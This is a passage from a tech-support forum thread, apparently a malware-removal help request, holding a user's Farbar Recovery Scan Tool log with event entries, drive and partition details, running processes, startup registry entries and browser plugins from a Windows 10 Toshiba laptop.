  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-03-09 11:41:44.512
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-03-09 11:41:44.385
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-03-09 11:41:44.278
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-03-09 11:41:44.169
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.


==================== Memory info ===========================

Processor: Intel® Core i5 CPU M 520 @ 2.40GHz
Percentage of memory in use: 69%
Total physical RAM: 3890.67 MB
Available physical RAM: 1197.64 MB
Total Virtual: 8754.67 MB
Available Virtual: 5846.27 MB

==================== Drives ================================

Drive c: (TI105835W0O) (Fixed) (Total:453.17 GB) (Free:111.73 GB) NTFS ==>[system with boot components (obtained from drive)]

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or Vista) (Size: 465.8 GB) (Disk ID: E56E3D6C)
Partition 1: (Active) - (Size=1.5 GB) - (Type=27)
Partition 2: (Not Active) - (Size=453.2 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=511 MB) - (Type=27)
Partition 4: (Not Active) - (Size=10.6 GB) - (Type=17)

==================== End of Addition.txt ============================

Link to post
Share on other sites

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:05-03-2016 01
Ran by Lexi (administrator) on DURABLE (09-03-2016 14:51:01)
Running from C:\Users\Lexi\Downloads
Loaded Profiles: Lexi (Available Profiles: Lexi & DefaultAppPool)
Platform: Windows 10 Home (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Edge)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RTKAUDIOSERVICE64.EXE
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Malwarebytes) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Amazon.com) C:\Program Files (x86)\Amazon\Amazon Unbox Video\ADVWindowsClientService.exe
(Malwarebytes) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe
(Apple Inc.) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
(Microsoft Corporation) C:\Windows\System32\mqsvc.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
(LeapFrog Enterprises, Inc.) C:\Program Files (x86)\LeapFrog\LeapFrog Connect\CommandService.exe
(Symantec Corporation) C:\Program Files (x86)\Norton PC Checkup\Engine\2.0.3.198\ccSvcHst.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
(TOSHIBA Corporation) C:\Windows\System32\TODDSrv.exe
(TOSHIBA Corporation) C:\Windows\System32\ThpSrv.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MsMpEng.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\Power Saver\TosCoSrv.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TECO\TecoService.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\NisSrv.exe
(Symantec Corporation) C:\Program Files (x86)\Norton PC Checkup\Engine\2.0.3.198\ccSvcHst.exe
(Malwarebytes) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.29.5\GoogleCrashHandler.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.29.5\GoogleCrashHandler64.exe
(Microsoft Corporation) C:\Windows\System32\SettingSyncHost.exe
(Intel Corporation) C:\Windows\System32\igfxtray.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(TOSHIBA Corporation) C:\Windows\System32\ThpSrv.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\Power Saver\TPwrMain.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\SmoothView\SmoothView.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\FlashCards\TCrdMain.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TECO\Teco.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\SmartFaceV\SmartFaceVWatcher.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\BulletinBoard\TosNcCore.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\ReelTime\TosReelTimeMonitor.exe
() C:\Program Files\TOSHIBA\FlashCards\Hotkey\TCrdKBB.exe
(Intel Corporation) C:\Windows\System32\igfxext.exe
(PFU LIMITED) C:\Program Files (x86)\PFU\ScanSnap\CardMinder\CardLauncher.exe
(Amazon Digital Services, LLC.) C:\Users\Lexi\AppData\Local\Apps\2.0\2DJ030TV.4OO\2H60B505.COR\amaz..tion_f2fa081ea2183235_0002.0001_cb34a912a946f839\AmazonCloudDrive.exe
(TOSHIBA CORPORATION) C:\Program Files (x86)\TOSHIBA\Utilities\KeNotify.exe
(Evernote Corp., 305 Walnut Street, Redwood City, CA 94063) C:\Program Files (x86)\Evernote\Evernote\EvernoteClipper.exe
(TOSHIBA CORPORATION.) C:\Program Files (x86)\TOSHIBA\TOSHIBA Web Camera Application\TWebCamera.exe
(LeapFrog Enterprises, Inc.) C:\Program Files (x86)\LeapFrog\LeapFrog Connect\Monitor.exe
(LG Electronics) C:\ProgramData\LGMOBILEAX\BYR_Client\VZWUAAgent.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
(Sun Microsystems, Inc.) C:\Users\Lexi\AppData\Local\Apps\2.0\2DJ030TV.4OO\2H60B505.COR\amaz..tion_f2fa081ea2183235_0002.0001_cb34a912a946f839\LocalServiceJre\bin\AmazonCloudDriveW.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MpCmdRun.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TPHM\TPCHSrv.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosSmartSrv.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosSENotify.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TPHM\TPCHWMsg.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Microsoft Corporation) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe


==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [16174328 2015-09-28] (Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1411840 2015-09-28] (Realtek Semiconductor)
HKLM\...\Run: [ThpSrv] => C:\windows\system32\thpsrv /logon
HKLM\...\Run: [TPwrMain] => C:\Program Files\TOSHIBA\Power Saver\TPwrMain.EXE [505696 2009-11-06] (TOSHIBA Corporation)
HKLM\...\Run: [HSON] => C:\Program Files\TOSHIBA\TBS\HSON.exe [52600 2009-03-09] (TOSHIBA Corporation)
HKLM\...\Run: [smoothView] => C:\Program Files\Toshiba\SmoothView\SmoothView.exe [508216 2009-07-28] (TOSHIBA Corporation)
HKLM\...\Run: [00TCrdMain] => C:\Program Files\TOSHIBA\FlashCards\TCrdMain.exe [913720 2010-03-25] (TOSHIBA Corporation)
HKLM\...\Run: [Teco] => C:\Program Files\TOSHIBA\TECO\Teco.exe [1489760 2010-04-06] (TOSHIBA Corporation)
HKLM\...\Run: [TosWaitSrv] => C:\Program Files\TOSHIBA\TPHM\TosWaitSrv.exe [705368 2010-02-23] (TOSHIBA Corporation)
HKLM\...\Run: [smartFaceVWatcher] => C:\Program Files\Toshiba\SmartFaceV\SmartFaceVWatcher.exe [238080 2009-10-19] (TOSHIBA Corporation)
HKLM\...\Run: [TosVolRegulator] => C:\Program Files\TOSHIBA\TosVolRegulator\TosVolRegulator.exe [24376 2009-11-11] (TOSHIBA Corporation)
HKLM\...\Run: [TosSENotify] => C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosWaitSrv.exe [709976 2010-02-05] (TOSHIBA Corporation)
HKLM\...\Run: [TosNC] => C:\Program Files\Toshiba\BulletinBoard\TosNcCore.exe [595816 2010-03-19] (TOSHIBA Corporation)
HKLM\...\Run: [TosReelTimeMonitor] => C:\Program Files\TOSHIBA\ReelTime\TosReelTimeMonitor.exe [35672 2010-03-03] (TOSHIBA Corporation)
HKLM\...\Run: [synTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [3944648 2015-06-12] (Synaptics Incorporated)
HKLM-x32\...\Run: [KeNotify] => C:\Program Files (x86)\TOSHIBA\Utilities\KeNotify.exe [34160 2009-12-25] (TOSHIBA CORPORATION)
HKLM-x32\...\Run: [HWSetup] => C:\Program Files\TOSHIBA\Utilities\HWSetup.exe [423936 2010-03-04] (TOSHIBA Electronics, Inc.)
HKLM-x32\...\Run: [sVPWUTIL] => C:\Program Files (x86)\TOSHIBA\Utilities\SVPWUTIL.exe [352256 2010-02-22] (TOSHIBA CORPORATION)
HKLM-x32\...\Run: [TWebCamera] => C:\Program Files (x86)\TOSHIBA\TOSHIBA Web Camera Application\TWebCamera.exe [2454840 2010-02-24] (TOSHIBA CORPORATION.)
HKLM-x32\...\Run: [TSleepSrv] => C:\Program Files (x86)\TOSHIBA\TOSHIBA Sleep Utility\TSleepSrv.exe [252728 2010-03-17] (TOSHIBA)
HKLM-x32\...\Run: [NortonOnlineBackupReminder] => C:\Program Files (x86)\TOSHIBA\Toshiba Online Backup\Activation\TobuActivation.exe [529256 2009-08-10] (Toshiba)
HKLM-x32\...\Run: [secure Online Account Numbers] => C:\Program Files (x86)\Discover\SOAN\DiscoverSOAN.exe [376832 2010-03-05] (Orbiscom Ltd. All rights reserved.)
HKLM-x32\...\Run: [brMfcWnd] => C:\Program Files (x86)\Brother\Brmfcmon\BrMfcWnd.exe [1159168 2009-05-26] (Brother Industries, Ltd.)
HKLM-x32\...\Run: [ControlCenter3] => C:\Program Files (x86)\Brother\ControlCenter3\brctrcen.exe [114688 2008-12-24] (Brother Industries, Ltd.)
HKLM-x32\...\Run: [scanSnap WIA Service Checker] => C:\windows\SSDriver\fi5110\SsWiaChecker.exe
HKLM-x32\...\Run: [Monitor] => C:\Program Files (x86)\LeapFrog\LeapFrog Connect\Monitor.exe [118272 2014-07-11] (LeapFrog Enterprises, Inc.)
HKLM-x32\...\Run: [QuickTime Task] => C:\Program Files (x86)\QuickTime\QTTask.exe [421888 2011-07-05] (Apple Inc.)
HKLM-x32\...\Run: [iTunesHelper] => C:\Program Files (x86)\iTunes\iTunesHelper.exe [421736 2011-08-19] (Apple Inc.)
HKLM-x32\...\Run: [bYRUA_AGENT] => C:\ProgramData\LGMOBILEAX\BYR_Client\VZWUAAgent.exe [380024 2012-09-24] (LG Electronics)
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1085656 2015-12-13] (Adobe Systems Incorporated)
Winlogon\Notify\igfxcui: C:\WINDOWS\system32\igfxdev.dll (Intel Corporation)
HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\...\Run: [GoogleChromeAutoLaunch_AC2BF96DE3E4AFDBE25411FD527B2AD1] => C:\Program Files (x86)\Google\Chrome\Application\chrome.exe [746648 2016-02-17] (Google Inc.)
HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\...\Run: [FileThis Fetch] => C:\Program Files (x86)\FileThis\FileThis Fetch\FileThis Fetch.exe [350208 2013-05-24] (FileThis)
HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\...\Run: [swg] => C:\Program Files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe [39408 2010-05-28] (Google Inc.)
HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\...\Run: [skitch] => C:\Program Files (x86)\Evernote\Skitch\Skitch.exe [4304704 2013-08-09] (Evernote)
HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\...\Policies\Explorer: [NoSetActiveDesktop] 0
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Amazon Unbox.lnk [2012-12-12]
ShortcutTarget: Amazon Unbox.lnk -> C:\Program Files (x86)\Amazon\Amazon Unbox Video\ADVWindowsClientSystemTray.exe (Amazon.com)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Audible Download Manager.lnk [2010-09-24]
ShortcutTarget: Audible Download Manager.lnk -> C:\Program Files (x86)\Audible\Bin\AudibleDownloadHelper.exe (Audible, Inc.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\BodyMedia Sync.lnk [2013-01-17]
ShortcutTarget: BodyMedia Sync.lnk -> C:\Program Files (x86)\BodyMedia\Sync\BodyMediaSync.exe (BodyMedia, Inc.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\CardMinder Viewer.lnk [2011-07-19]
ShortcutTarget: CardMinder Viewer.lnk -> C:\Program Files (x86)\PFU\ScanSnap\CardMinder\CardLauncher.exe (PFU LIMITED)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Conversion to PDF with ScanSnap Organizer.lnk [2011-07-19]
ShortcutTarget: Conversion to PDF with ScanSnap Organizer.lnk -> C:\Program Files (x86)\PFU\ScanSnap\Organizer\PfuSsOrgOcrChk.exe (PFU LIMITED)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ScanSnap Manager.lnk [2013-05-28]
ShortcutTarget: ScanSnap Manager.lnk -> C:\Program Files (x86)\PFU\ScanSnap\Driver\PfuSsMon.exe (PFU LIMITED)
Startup: C:\Users\Lexi\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Amazon Cloud Drive.lnk [2016-03-09]
ShortcutTarget: Amazon Cloud Drive.lnk -> C:\Users\Lexi\AppData\Local\Apps\2.0\2DJ030TV.4OO\2H60B505.COR\amaz..tion_f2fa081ea2183235_0002.0001_cb34a912a946f839\AmazonCloudDrive.exe (Amazon Digital Services, LLC.)
Startup: C:\Users\Lexi\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EvernoteClipper.lnk [2015-07-31]
ShortcutTarget: EvernoteClipper.lnk -> C:\Program Files (x86)\Evernote\Evernote\EvernoteClipper.exe (Evernote Corp., 305 Walnut Street, Redwood City, CA 94063)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{0377792b-7629-45e2-ae76-3047b41ccf06}: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{69348f7a-a204-4307-bdbe-d51a41143651}: [DhcpNameServer] 10.0.5.3 10.0.5.2

Internet Explorer:
==================
HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.google.com/ig/redirectdomain?brand=TSNA&bmod=TSNA
HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\Software\Microsoft\Internet Explorer\Main,Start Page Restore = hxxp://www.google.com/calendar/render?hl=en&tab=wc&gsessionid=pOBMFiDq2Uvgtsn9Tik9KQ
HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\Software\Microsoft\Internet Explorer\Main,Secondary Start Pages = hxxp://www.facebook.com/
hxxps://www.google.com/calendar/render?hl=en&tab=wc&pli=1&gsessionid=OK
HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\Software\Microsoft\Internet Explorer\Main,Search Bar = hxxp://www.google.com/ie
HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.google.com/ie
SearchScopes: HKLM -> DefaultScope {60C66211-88F6-486E-8303-B0B10E4FD293} URL = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7TSNA
SearchScopes: HKLM -> {60C66211-88F6-486E-8303-B0B10E4FD293} URL = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7TSNA
SearchScopes: HKLM-x32 -> DefaultScope {B1243C39-DE64-4E02-BC80-265B7BD496B1} URL =
SearchScopes: HKLM-x32 -> {9D2BF1CD-96EB-4EA4-9D12-EEAA66D4FC8D} URL = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7TSNA
SearchScopes: HKU\S-1-5-21-2574262253-2623044021-4024016403-1001 -> {23758B0B-0D9F-32A3-A476-D9B1033E7A1E} URL = hxxp://www.bing.com/search?q={searchTerms}&pc=ZUGO&form=ZGAIDF
SearchScopes: HKU\S-1-5-21-2574262253-2623044021-4024016403-1001 -> {57A65587-8AEC-4FF9-A3A3-32330322F26B} URL = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7TSNA_enUS393US394
BHO: Java Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre7\bin\ssv.dll [2013-07-29] (Oracle Corporation)
BHO: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2016-01-02] (Google Inc.)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL [2013-03-06] (Microsoft Corporation)
BHO: Java Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre7\bin\jp2ssv.dll [2013-07-29] (Oracle Corporation)
BHO-x32: Secure Online Account Numbers Helper -> {435EAA86-D32B-484F-869C-53745FCB1642} -> C:\Program Files (x86)\Discover\SOAN\DiscoverSOANHelper.dll [2010-03-05] (Orbiscom Ltd. All rights reserved.)
BHO-x32: Java Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Oracle\JavaFX 2.1 Runtime\bin\ssv.dll [2012-05-04] (Oracle Corporation)
BHO-x32: Evernote extension -> {92EF2EAD-A7CE-4424-B0DB-499CF856608E} -> C:\Program Files (x86)\Evernote\Evernote\EvernoteIE.dll [2015-12-01] (Evernote Corp., 305 Walnut Street, Redwood City, CA 94063)
BHO-x32: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll [2016-01-02] (Google Inc.)
BHO-x32: Skype Plug-In -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\skypeieplugin.dll [2010-11-22] (Skype Technologies S.A.)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL [2013-03-06] (Microsoft Corporation)
BHO-x32: Java Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Oracle\JavaFX 2.1 Runtime\bin\jp2ssv.dll [2012-05-04] (Oracle Corporation)
BHO-x32: Google Gears Helper -> {E0FEFE40-FBF9-42AE-BA58-794CA7E3FB53} -> C:\Program Files (x86)\Google\Google Gears\Internet Explorer\0.5.36.0\gears.dll [2010-02-23] (Google Inc.)
BHO-x32: TOSHIBA Media Controller Plug-in -> {F3C88694-EFFA-4d78-B409-54B7B2535B14} -> C:\Program Files (x86)\TOSHIBA\TOSHIBA Media Controller Plug-in\TOSHIBAMediaControllerIE.dll [2010-03-19] (<TOSHIBA>)
Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2016-01-02] (Google Inc.)
Toolbar: HKLM-x32 - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll [2016-01-02] (Google Inc.)
Toolbar: HKU\S-1-5-21-2574262253-2623044021-4024016403-1001 -> Google Toolbar - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2016-01-02] (Google Inc.)
Handler-x32: belarc - {6318E0AB-2E93-11D1-B8ED-00608CC9A71F} - C:\Program Files (x86)\Belarc\BelarcAdvisor\System\BAVoilaX.dll [2013-03-29] (Belarc, Inc.)
Handler-x32: cozi - {5356518D-FE9C-4E08-9C1F-1E872ECD367F} - C:\Program Files (x86)\Cozi Express\CoziProtocolHandler.dll [2010-12-29] (Cozi Group, Inc.)
Handler-x32: skype-ie-addon-data - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\skypeieplugin.dll [2010-11-22] (Skype Technologies S.A.)
StartMenuInternet: IEXPLORE.EXE - iexplore.exe

FireFox:
========
FF ProfilePath: C:\Users\Lexi\AppData\Roaming\Mozilla\Firefox\Profiles\s9ln76d7.default-1398562510049
FF NewTab: about:newtab
FF DefaultSearchEngine: Search Provided by Yahoo
FF DefaultSearchEngine.US: Google
FF SelectedSearchEngine: Search Provided by Yahoo
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_20_0_0_306.dll [2016-02-10] ()
FF Plugin: @java.com/DTPlugin,version=10.25.2 -> C:\windows\system32\npDeployJava1.dll [2013-07-29] (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=10.25.2 -> C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll [2013-07-29] (Oracle Corporation)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.41212.0\npctrl.dll [2015-12-11] ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_20_0_0_306.dll [2016-02-10] ()
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll [2011-07-29] ()
FF Plugin-x32: @foxitsoftware.com/Foxit Reader Plugin,version=1.0,application/pdf -> C:\Program Files (x86)\Foxit Software\Foxit Reader\plugins\npFoxitReaderPlugin.dll [2013-01-11] (Foxit Corporation)
FF Plugin-x32: @Google.com/GoogleEarthPlugin -> C:\Program Files (x86)\Google\Google Earth\plugin\npgeplugin.dll [2013-10-07] (Google)
FF Plugin-x32: @java.com/DTPlugin,version=10.25.2 -> C:\windows\SysWOW64\npDeployJava1.dll [2013-07-29] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.5.1 -> C:\Program Files (x86)\Oracle\JavaFX 2.1 Runtime\bin\plugin2\npjp2.dll [2012-05-04] (Oracle Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.41212.0\npctrl.dll [2015-12-11] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MIF5BA~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MIF5BA~1\Office14\NPSPWRAP.DLL [2010-03-24] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2010-09-23] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-02] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-02] (Google Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll [2015-12-17] (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-2574262253-2623044021-4024016403-1001: amazon.com/AmazonMP3DownloaderPlugin -> C:\Program Files (x86)\Amazon\MP3 Downloader\npAmazonMP3DownloaderPlugin1017300.dll [2012-08-28] (Amazon.com, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\NPcol400.dll [2010-12-14] (Catalina Marketing Corporation)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\NPcol500.dll [2010-12-14] (Catalina Marketing Corporation)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\nppdf32.dll [2015-06-29] (Adobe Systems Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin.dll [2011-08-24] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin2.dll [2011-08-24] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin3.dll [2011-08-24] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin4.dll [2011-08-24] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin5.dll [2011-08-24] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin6.dll [2011-08-24] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin7.dll [2011-08-24] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\browser\plugins\npMozCouponPrinter.dll [2012-10-19] (Coupons, Inc.)
FF Extension: Evernote Web Clipper - C:\Users\Lexi\AppData\Roaming\Mozilla\Firefox\Profiles\s9ln76d7.default-1398562510049\Extensions\{E0B8C461-F8FB-49b4-8373-FE32E9252800}.xpi [2015-12-08]
FF Extension: Skype extension - C:\Program Files (x86)\Mozilla Firefox\extensions\{AB2CE124-6272-4b12-94A9-7303C7397BD1} [2016-01-12] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [{000a9d1c-beef-4f90-9363-039d445309b8}] - C:\Program Files (x86)\Google\Google Gears\Firefox
FF Extension: Google Gears - C:\Program Files (x86)\Google\Google Gears\Firefox [2010-08-20] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [discoversoan@orbiscom] - C:\Program Files (x86)\Discover\SOAN
FF Extension: Secure Online Account Numbers - C:\Program Files (x86)\Discover\SOAN [2010-11-20] [not signed]

Chrome:
=======
CHR Plugin: (Shockwave Flash) - C:\Program Files (x86)\Google\Chrome\Application\49.0.2623.75\PepperFlash\pepflashplayer.dll => No File
CHR Plugin: (Native Client) - C:\Program Files (x86)\Google\Chrome\Application\49.0.2623.75\ppGoogleNaClPluginChrome.dll => No File
CHR Plugin: (Chrome PDF Viewer) - C:\Program Files (x86)\Google\Chrome\Application\49.0.2623.75\pdf.dll => No File
